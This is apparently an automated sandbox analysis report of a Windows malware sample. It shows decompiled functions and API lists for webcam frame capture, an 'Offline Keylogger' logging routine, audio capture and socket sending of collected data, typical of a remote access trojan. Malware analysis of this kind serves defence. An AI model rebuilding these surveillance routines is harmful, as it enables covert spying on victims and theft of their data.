                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                        • String ID:
                                        • API String ID: 1196022968-0
                                        • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                        • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                        • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00401CCF, Relevance: 31.6, APIs: 14, Strings: 4, Instructions: 132sleepCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 19%
                                        			E00401CCF(intOrPtr* __eax, void* __eflags, intOrPtr _a4, void* _a8) {
				char _v20;
				char _v36;
				void* __ebp;
				void* _t22;
				void* _t23;
				void* _t32;
				char* _t33;
				void* _t36;
				void* _t38;
				signed char _t39;
				signed char _t41;
				char* _t42;
				int _t43;
				intOrPtr _t65;
				signed char _t66;
				void* _t68;
				intOrPtr* _t71;

				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
				_t65 =  *__eax;
				__imp__?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
				E004129EB(__eflags,  &_v20,  &_v36,  &E0041B310,  &_v36, 4,  *__imp__?npos@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@2IB);
				_t71 = _t68 + 0x24;
				_t22 = _t65 - 0x3c;
				if(_t22 == 0) {
					_t23 = E0040180C( &_v20, __eflags, 0);
					__imp__?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
					_t66 = E00406DD9(_t23);
					__eflags = _t66;
					if(_t66 != 0) {
						 *0x41b2ec = E00407033(_t66, "OpenCamera");
						 *0x41b2f0 = E00407033(_t66, "CloseCamera");
						 *0x41b2f4 = E00407033(_t66, "GetFrame");
						 *0x41b2f8 = E00407033(_t66, "FreeFrame");
						 *0x41b2e8 = 1;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
						_push(0x1b);
						goto L15;
					}
				} else {
					_t32 = _t22 - 1;
					if(_t32 == 0) {
						__eflags =  *0x41b2e9;
						if(__eflags != 0) {
							goto L8;
						}
					} else {
						_t36 = _t32 - 1;
						if(_t36 == 0) {
							 *0x41b2f0();
							 *0x41b2e9 =  *0x41b2e9 & 0x00000000;
						} else {
							_t38 = _t36 - 1;
							if(_t38 == 0) {
								_t39 =  *0x41b2ec();
								__eflags = _t39;
								 *0x41b2e9 = _t39;
								if(__eflags == 0) {
									goto L9;
								} else {
									L8:
									_t33 = E0040180C( &_v20, __eflags, 0);
									__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
									_push(atoi(_t33));
									_push(_a4);
									E00401EA2(__eflags);
								}
							} else {
								if(_t38 == 1) {
									_t41 =  *0x41b2ec();
									_t81 = _t41;
									 *0x41b2e9 = _t41;
									if(_t41 == 0) {
										L9:
										__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z(0x41b290);
										_push(0x41);
										L15:
										E004020C2(_a4);
									} else {
										_t42 = E0040180C( &_v20, _t81, 0);
										__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
										_t43 = atoi(_t42);
										 *_t71 = 0x3e8;
										Sleep(??);
										E00401EA2(_t81);
										 *0x41b2f0(_a4, _t43);
									}
								}
							}
						}
					}
				}
				E004017DD( &_v20);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return 0;
			}




















                                        0x00401cd9
                                        0x00401cdf
                                        0x00401cf1
                                        0x00401d01
                                        0x00401d10
                                        0x00401d1a
                                        0x00401d21
                                        0x00401d24
                                        0x00401d27
                                        0x00401e08
                                        0x00401e0f
                                        0x00401e1b
                                        0x00401e1e
                                        0x00401e20
                                        0x00401e33
                                        0x00401e43
                                        0x00401e53
                                        0x00401e60
                                        0x00401e67
                                        0x00401e73
                                        0x00401e79
                                        0x00000000
                                        0x00401e79
                                        0x00401d2d
                                        0x00401d2d
                                        0x00401d2e
                                        0x00401df4
                                        0x00401dfb
                                        0x00000000
                                        0x00401e01
                                        0x00401d34
                                        0x00401d34
                                        0x00401d35
                                        0x00401de2
                                        0x00401de8
                                        0x00401d3b
                                        0x00401d3b
                                        0x00401d3c
                                        0x00401d92
                                        0x00401d98
                                        0x00401d9a
                                        0x00401d9f
                                        0x00000000
                                        0x00401da1
                                        0x00401da1
                                        0x00401da6
                                        0x00401dad
                                        0x00401dba
                                        0x00401dbb
                                        0x00401dbe
                                        0x00401dc3
                                        0x00401d3e
                                        0x00401d3f
                                        0x00401d45
                                        0x00401d4b
                                        0x00401d4d
                                        0x00401d52
                                        0x00401dcb
                                        0x00401dd5
                                        0x00401ddb
                                        0x00401e7b
                                        0x00401e7e
                                        0x00401d54
                                        0x00401d59
                                        0x00401d60
                                        0x00401d67
                                        0x00401d6f
                                        0x00401d76
                                        0x00401d80
                                        0x00401d87
                                        0x00401d87
                                        0x00401d52
                                        0x00401d3f
                                        0x00401d3c
                                        0x00401d35
                                        0x00401d2e
                                        0x00401e86
                                        0x00401e8e
                                        0x00401e97
                                        0x00401ea1

                                        APIs
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                        • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6F5E5DF0), ref: 00401CF1
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(Function_0001B310), ref: 00401D01
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                          • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                          • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                          • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                          • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                          • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                          • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                        • atoi.MSVCRT ref: 00401D67
                                        • Sleep.KERNEL32 ref: 00401D76
                                          • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                          • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                          • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(Function_0001B310,?,Function_0001B310,0041B290), ref: 00401F05
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                          • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                          • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                        • atoi.MSVCRT ref: 00401DB4
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                        • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                        • API String ID: 3050406488-3547787478
                                        • Opcode ID: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                        • Opcode Fuzzy Hash: ae9937307aeeb6decfdbd23ab4b6f41bf0febac1b666599084c879192010cd0a
                                        • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00405DD3, Relevance: 31.6, APIs: 15, Strings: 3, Instructions: 75timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 33%
                                        			E00405DD3(void* __ecx, char _a4) {
				struct _SYSTEMTIME _v20;
				char _v36;
				char _v52;
				char* _t24;
				char* _t25;
				char* _t33;
				int _t34;
				void* _t46;
				void* _t47;

				_t47 = __ecx;
				GetLocalTime( &_v20);
				_t24 =  &_v52;
				L00414176();
				_t25 =  &_v36;
				L00414170();
				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
				_t46 = malloc(_t25 + 0x64);
				_t33 = _v20.wYear & 0x0000ffff;
				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
				_t34 = sprintf(_t46, _t33);
				if( *((char*)(_t47 + 0x3c)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
				}
				if( *((char*)(_t47 + 0x3d)) != 0) {
					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
					_t20 = _t47 + 0x34; // 0x0
					_t34 = SetEvent( *_t20);
				}
				free(_t46);
				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
				return _t34;
			}












                                        0x00405dde
                                        0x00405de1
                                        0x00405df0
                                        0x00405df9
                                        0x00405e02
                                        0x00405e06
                                        0x00405e12
                                        0x00405e1b
                                        0x00405e24
                                        0x00405e2d
                                        0x00405e3d
                                        0x00405e5c
                                        0x00405e61
                                        0x00405e69
                                        0x00405e76
                                        0x00405e7c
                                        0x00405e7c
                                        0x00405e86
                                        0x00405e8c
                                        0x00405e92
                                        0x00405e95
                                        0x00405e95
                                        0x00405e9c
                                        0x00405ea6
                                        0x00405eaf

                                        APIs
                                        • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                        • malloc.MSVCRT ref: 00405E37
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                        • sprintf.MSVCRT ref: 00405E69
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                        • SetEvent.KERNEL32(00000000), ref: 00405E95
                                        • free.MSVCRT(00000000), ref: 00405E9C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                        • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                        • API String ID: 2201004561-248792730
                                        • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                        • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                        • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402440, Relevance: 31.6, APIs: 17, Strings: 1, Instructions: 72networkCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041BE70,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040244A
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402463
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040246E
                                        • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040247B
                                        • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040248D
                                        • ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402498
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024A7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024B1
                                        • send.WS2_32(?,00000000), ref: 004024BB
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024C7
                                        • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024D1
                                        • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024EB
                                        • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 004024F5
                                        • send.WS2_32(?,00000000), ref: 004024FF
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402509
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 00402512
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,004020DF,0040CF62,?,0040CF62,0000004B), ref: 0040251B
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$?length@?$basic_string@$??1?$basic_string@$?data@?$basic_string@A?$basic_string@send$??0?$basic_string@?c_str@?$basic_string@?empty@?$basic_string@D@1@@V01@V01@@Y?$basic_string@
                                        • String ID: [DataStart]
                                        • API String ID: 1403384299-3852763199
                                        • Opcode ID: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction ID: 4f95a53d81068631c3648da1c5498cf22458e2818172e99049c3d90a1b667ab5
                                        • Opcode Fuzzy Hash: a6039b55a21c89a02e1cf1528b19330316269f3f8a1329a8a34a52ca146de8b9
                                        • Instruction Fuzzy Hash: 7621EA72500509EBCB05DF90DD599EE7778EB98342F108176E907A61E0DB705E44CFA9
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0040122D, Relevance: 30.1, APIs: 20, Instructions: 118threadCOMMON
                                        Download Yara Rule
                                        APIs
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                        • closesocket.WS2_32 ref: 00401266
                                        • ExitThread.KERNEL32 ref: 00401274
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,Function_0001B310,00000000), ref: 0040129D
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(0041B218,00000012,?,Function_0001B310,00000000), ref: 004012B3
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                        • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                        • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                        • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                        • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                        • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                        Memory Dump Source
                                        • Source File: 00000019.00000002.914491877.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                        Yara matches
                                        Similarity
                                        • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                        • String ID:
                                        • API String ID: 3470141593-0
                                        • Opcode ID: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                        • Opcode Fuzzy Hash: e0d2f9db34cf0629cb1e285ec2437386fbdd7813bf54cbf6243c0989171c965f
                                        • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00402637, Relevance: 29.8, APIs: 14, Strings: 3, Instructions: 94timeCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 28%
                                        			E00402637(void* __ecx, intOrPtr _a4) {
				char _v5;
				struct _SYSTEMTIME _v24;
				char _v40;
				char _v56;
				char* _t42;
				char* _t43;
				char* _t50;
				char* _t51;
				void* _t68;
				void* _t69;

				_t68 = __ecx;
				if( *((char*)(__ecx + 0x38)) == 0) {
					return 0;
				}
				if( *0x41bcac != 0) {
					if( *((char*)(__ecx + 0x44)) != 0) {
						GetLocalTime( &_v24);
						_t50 =  &_v5;
						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
						_t51 =  &_v40;
						L00414170();
						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
						printf(_t51);
